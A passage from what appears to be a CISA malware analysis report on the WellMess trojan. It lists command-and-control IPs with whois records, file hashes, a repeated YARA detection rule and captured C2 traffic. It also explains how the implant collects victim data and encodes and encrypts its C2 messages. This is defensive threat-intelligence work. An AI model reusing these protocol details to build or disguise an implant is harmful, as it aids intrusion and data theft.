This is the same REGEX value the WellMess sample\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 uses to parse command data.\r\n141.98.212.55\r\nTags\r\ncommand-and-control\r\nPorts\r\n53 TCP\r\nWhois\r\ninetnum:        141.98.212.0 - 141.98.212.255\r\nnetname:        EstNOC-HongKong\r\ndescr:         EstNOC-Global\r\ncountry:        HK\r\nadmin-c:        EE2159-RIPE\r\ntech-c:         EE2159-RIPE\r\nabuse-c:        ACRO394-RIPE\r\nmnt-routes:     ESTNOC-MNT\r\nmnt-domains:    ESTNOC-MNT\r\nmnt-lower:     ESTNOC-MNT\r\nstatus:         SUB-ALLOCATED PA\r\nremarks:        - - - LEGAL CONCERNS - - -\r\nremarks:        For any legal requests, please send an E-mail to\r\nremarks:        eu-legal@estnoc.ee for a maximum of 48hours response.\r\nremarks:        - - - LEGAL CONCERNS - - -\r\norg:            ORG-EA968-RIPE\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2019-02-18T10:02:16Z\r\nlast-modified: 2020-06-01T20:40:40Z\r\nsource:         RIPE\r\norganisation: ORG-EA968-RIPE\r\norg-name:     ESTNOC-GLOBAL\r\norg-type:     OTHER\r\naddress:        Estonia, Parnumaa, Tori vald, Muti kyla, 86811\r\ne-mail:         webmaster@estnoc.ee\r\nabuse-c:        ACRO394-RIPE\r\nmnt-ref:        ESTNOC-MNT\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2016-03-02T22:52:16Z\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 22 of 44\n\nlast-modified: 2018-09-19T21:55:53Z\r\nsource:         RIPE\r\nperson:         Ego Ennok\r\naddress:        Estonia, Parnumaa, Tori vald, Muti kyla, 86811\r\nphone:         +37258501736\r\nnic-hdl:        EE2159-RIPE\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2016-03-02T21:24:09Z\r\nlast-modified: 2016-03-02T21:24:09Z\r\nsource:         RIPE\r\nRelationships\r\n141.98.212.55 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nDescription\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb attempts to connect to the IP 
address.\r\n209.58.186.196\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        209.58.184.0 - 209.58.191.255\r\nnetname:        LSW-HKG-10\r\ncountry:        HK\r\nadmin-c:        LA249-AP\r\ntech-c:         LA249-AP\r\nstatus:         ALLOCATED NON-PORTABLE\r\nmnt-by:         MAINT-LSW-SG\r\nmnt-irt:        IRT-LSW-SG\r\nlast-modified: 2016-07-27T07:50:12Z\r\nsource:         APNIC\r\nirt:            IRT-LSW-SG\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ne-mail:         apnic@sg.leaseweb.com\r\nabuse-mailbox: abuse@sg.leaseweb.com\r\nadmin-c:        LAPP1-AP\r\ntech-c:         LAPP1-AP\r\nauth:         # Filtered\r\nremarks:        abuse@sg.leaseweb.com was validated on 2019-12-12\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 23 of 44\n\nremarks:        apnic@sg.leaseweb.com was validated on 2020-06-03\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2020-06-03T14:50:15Z\r\nsource:         APNIC\r\nperson:         LSW Apnic\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ncountry:        SG\r\nphone:         +6531587350\r\ne-mail:         apnic@sg.leaseweb.com\r\nnic-hdl:        LA249-AP\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2016-06-06T08:59:04Z\r\nsource:         APNIC\r\nRelationships\r\n209.58.186.196 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nDescription\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb attempts to connect to the IP address.\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nTags\r\ntrojan\r\nDetails\r\nName 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nSize 6707096 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 4d38ac3319b167f6c8acb16b70297111\r\nSHA1 01a71390892fad77987aa09a630b04ff72e37d5d\r\nSHA256 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nSHA512 
aaae4d94f5a1b75917b2c948d4517928b457da0851f65a196b91f30ccd88645a1066b7111db6f7f2267092f8299520044cfcf4400f8285b01db6b\r\nssdeep 49152:Ik2WH801HarM2F75oeZbwriHBvV1WHr0q44gP1mZWPmoFjPnMBMaBJFtBE/k6rYD:ftHBHadoi+L0vcopfMnBz\r\nEntropy 6.005022\r\nAntivirus\r\nAntiy Trojan/Linux.Agent\r\nAvira LINUX/Agent.kiivu\r\nBitDefender Trojan.Linux.Generic.143453\r\nCyren ELF/Trojan.JTPD-6\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.143453 (B)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 24 of 44\n\nIkarus Trojan.Linux.Agent\r\nMcAfee GenericRXKJ-GH!4D38AC3319B1\r\nTrendMicro TROJ_FR.C35E7E37\r\nTrendMicro House Call TROJ_FR.C35E7E37\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    
MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 25 of 44\n\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    
$18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n7c39841ba4... Connected_To 192.48.88.107\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 26 of 44\n\nThis artifact is an ELF 64-bit file written in Go. It has been identified as a variant of the WellMess malware family. The\r\nprogram is capable of encrypting, decrypting, uploading and downloading files. The malware can also execute commands\r\nand send and receive encrypted communications.\r\nWhen the program is executed, it will attempt to contact its C2 at the IP address, 192.48.88.107 over TCP port 80. The\r\nprogram collects the IP address of the infected system, current username, and domain name to send to the C2. This data\r\nstring is appended with a unique SHA256 hash. The completed string is then RC6 encrypted and then Base64 encoded. 
Non-random characters are interspersed into the Base64 string for further obfuscation. The following is an example of the\r\nencoded string:\r\n—Begin Encoded String Example—\r\n9k90s+7zAwc+UNbXE+oav4+E0s9+aYCt+ICT+pu1e+hre8.+PkzUz+V7%2Cv0cl+V%2CEtY%2CN+bk4+ztw+S0Lg+UDlvkmX9k90s+7zAwc+UNbXE\r\n—End Encoded String Example—\r\nThe string is used to uniquely identify communication to and from the C2. The following is an example of the message\r\nformat:\r\n—Begin Message Format Example—\r\n\u003c;head;\u003e3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\u003c;he\r\n\u003c;title;\u003erc\u003c;title;\u003e\u003c;service;\u003e\u003c;service;\u003e\r\n—End Message Format Example—\r\nIn the example, the string ‘rc’ between the \u003ctitle\u003e delimiters indicates that the bot is waiting for a command. The\r\nhexadecimal string between the \u003chead\u003e delimiters is the original encoded string. This string translates to the following:\r\n—Begin String Translated—\r\n200.200.200.221||user|user\r\n3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\r\n—End String Translated—\r\nThe following Public Key is used for secure communication with the C2:\r\n— Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAh+WnVdCCA5i8cISqd+wR\r\nBZxqzhqwF71KW4Z+7yIiH9QeTUtlKYMlwxfre1ZcFM+QIpO9HyH4nJNe26r/nTH8\r\nxi4lfXomWmXpVs8CnjLe7eQCaFh5BJYbjCDSUopgfex/vxpdI/zDuxYlla8zKk6D\r\nic184naUNDbzbkR3/SuwV2kxA0EGGdlXi3LAL5aoD8xcR0PUaGuimhJQaO4fASwS\r\nBZvfx7km3xArlICnqbmrWzqnmh7j7K8eAmXH5pgDwGRR6ctJiS5nz9QlbxMOOhfI\r\nFKs9by/FpM+rA6gao7AdNTghvNKTVYSMi0U4UeaTSzKgH5EtqwZRXonSXQpk0ySl\r\nYwIDAQAB\r\n—End Public Key—\r\n192.48.88.107\r\nTags\r\ncommand-and-control\r\nPorts\r\n80 TCP\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nHost: 192.48.88.107\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 
Firefox/3.5.8\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 27 of 44\n\nContent-Length: 424\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie:\r\nTnKTjksd=f8E+Pt5lxY+is2+wt6+bcu6jw8+9aYCtI+CTpu1eh+re8PkzU+yec.+mfxQxvn+6ml4Z9+K%2CDIgKP+BQHE+5LXS+tQOe+XBUzY+\r\nZlttbIG9=+6sd+H2kngW+I90kBVA.+OrUY+tLOuc%2C+mFfoZ+DAc1j+7p9QhJ+e1A+dZC%3A6+G9U.+1GEjt9+QhS+qWm+Rwu7Jf+4nn+X\r\nAccept-Encoding: gzip\r\nYY8 UbA0 U7z:bvW 2sqTlfH 1VGk 78N EHW Jcg:r NOyw6l. SmP qvt9FS 5Ybxb4 sfLof9w wWxosmu Jgny\r\nTyBx6K v:2r. BXpW vtOeg PLl exu7n muk4j7 pw6bgWG ,vyS8V I3X. fXHsyy 6dI: z0sErgo Vj4oJ XZB4 ncW52\r\nieNnER Kaa5Q. XL:, ,oxRsgT cMnL LolKz CWa h:: 4RIZT fq:wehz. YBE kNeQXQ oovyQ5 roI KViKu7 geO\r\nQK8L UNZHx. BfFwjYU 0O8L 4lAeAx3 OeQwG LVBwk aGvNJ di,QS egx. iftAs VHNhsKo Kzw bidAlf msozP\r\npaWl7Bm mCcx quHWA. tzqw PEj qdY9RP SxiwZw    \r\nWhois\r\nNetRange:     192.48.88.0 - 192.48.91.255\r\nCIDR:         192.48.88.0/22\r\nNetName:        TOCICI-NET04\r\nNetHandle:     NET-192-48-88-0-1\r\nParent:         NET192 (NET-192-0-0-0-0)\r\nNetType:        Direct Allocation\r\nOriginAS:     AS14613\r\nOrganization: TOCICI LLC (TOCIC)\r\nRegDate:        2012-12-03\r\nUpdated:        2012-12-03\r\nComment:        24hr NOC www.tocici.com\r\nRef:            https://rdap.arin.net/registry/ip/192.48.88.0\r\nOrgName:        TOCICI LLC\r\nOrgId:         TOCIC\r\nAddress:        25 NW 23PL\r\nAddress:        STE 6-345\r\nCity:         Portland\r\nStateProv:     OR\r\nPostalCode:     97210\r\nCountry:        US\r\nRegDate:        2009-11-16\r\nUpdated:        2017-01-28\r\nComment:        http://www.tocici.com\r\nRef:            https://rdap.arin.net/registry/entity/TOCIC\r\nRelationships\r\n192.48.88.107 Connected_From 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\n192.48.88.107 Connected_From 
fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 28 of 44\n\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 and\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee attempts to connect to the IP address.\r\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nTags\r\ntrojan\r\nDetails\r\nName fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nSize 4121056 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 ae7a46529a0f74fb83beeb1ab2c68c5c\r\nSHA1 a57c896486564d7663a4dce6fbf723a1deb81378\r\nSHA256 fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nSHA512 85cba60ab37b138c271da13f899ee61434f56b24fa611e294e614f608fb8cf8b912fc59e0e5cd03070f57d01efadddd689edbaa65962f7ccfa6c70\r\nssdeep 49152:05RKx7rwGhSA/R/642M91Bj82r4W+26de59I5gj2P4yQmj:q2fwnA/V6g917B6o59Gbj\r\nEntropy 5.876729\r\nAntivirus\r\nAvira LINUX/Agent.itcql\r\nBitDefender Trojan.Linux.Generic.131015\r\nClamAV Unix.Trojan.WellMess-6706034-0\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.131015 (B)\r\nIkarus Trojan.Linux.Agent\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 29 of 44\n\nSHA256_3 = 
\"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 
65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 30 of 44\n\n$19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nfd3969d323... Connected_To 192.48.88.107\r\nDescription\r\nThis artifact is an ELF 64-bit written in Go. 
It has been identified as a variant of the WellMess malware family.\r\nWhen executed, it attempts to collect the following data from the victim's system:\r\n—Begin Data Collected—\r\nIP address of the victim system\r\nCurrent username\r\nDomain name\r\n—End Data Collected—\r\nThe data is stored in the following format:\r\n—Begin Format—\r\n\"200.200.200.150||root|root|e3b0c44298fc1c149afbf4c8996fb924\"\r\n—End Format—\r\nThe victim's system data is used to generate a unique identifier which is hexadecimal encoded and stored in the format\r\nbelow as a unique identifier of the victim's system:\r\n—Begin Message Format—\r\n\"\r\n\u003c;head;\u003e3230302e3230302e3230302e3135307c7c726f6f747c726f6f74e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/p\u003c;he\r\n\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;service;\u003ep\u003c;service;\u003e\"\r\n—End Message Format—\r\nIn the message above, the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. Data between the\r\n\u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands. Some of the\r\ncommands include the following:\r\n—Begin Commands—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 31 of 44\n\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n—End Commands—\r\nThe message above is encrypted with RC6 using a hard-coded encryption key. The encrypted data is then encoded using the\r\nBase64 encoding function. 
It trims Base64 \"=\" | \"/\" | \":\" and adds spaces with the\r\n\"_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal\" function.\r\nThe following is an example of how the Base64 encoded data is trimmed:\r\n—Begin Base64 Encoded Data—\r\nTnKTjksd=f8E+Pt5lxY+is2+wt6+bcu6jw8+9aYCtI+CTpu1eh+re8PkzU+yec.+mfxQxvn+6ml4Z9+K%2CDIgKP+BQHE+5LXS+tQOe+XBUzY+8qxv.+\r\nZlttbIG9=+6sd+H2kngW+I90kBVA.+OrUY+tLOuc%2C+mFfoZ+DAc1j+7p9QhJ+e1A+dZC%3A6+G9U.+1GEjt9+QhS+qWm+Rwu7Jf+4nn+XBQ8lsO\r\n—End Base64 Encoded Data—\r\nThe final trimmed Base64 encoded data is stored in the “Cookie” header. The malware communicates with its C2 server at\r\nthe IP address 192.48.88.107 using HTTP requests which are RSA-encrypted and Base64 encoded. The \"Cookie\" header\r\nwill contain the RC6 encrypted information, including the system unique identifier, mentioned above. The bottom of the\r\nmessage body will contain a dynamically generated AES key, which is encrypted utilizing a hard-coded public RSA key.\r\nThe AES key will be utilized to secure the transfer of C2 data between the remote operator and the malware, including\r\nexecutable scripts, which are executed on the target system.\r\nAnalysis indicates that once a connection is established, the malware is designed to initiate a command and control service\r\nfrom the remote operator using the function \"_/home/ubuntu/GoProject/src/bot/botlib.Work\". 
It performs functions based on\r\nthe received commands:\r\n—Begin Functions—\r\nFile upload\r\nFile download\r\nChange user-agent string\r\n—End Functions—\r\nThe following Public Key is used for secure communication with the C2:\r\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nTags\r\ntrojan\r\nDetails\r\nName e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nSize 6707096 bytes\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 32 of 44\n\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 2f9f4f2a9d438cdc944f79bdf44a18f8\r\nSHA1 709878e13633e44b45ad1ab569ad34e3dc1efd3b\r\nSHA256 e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nSHA512 9626f0896b5a657cd48ccb79fe5701e92b3def3210be596bcf561b8f20f3e7daa532654ab00351fcea7598348a76aa911f3cb8be796d38bca0223\r\nssdeep 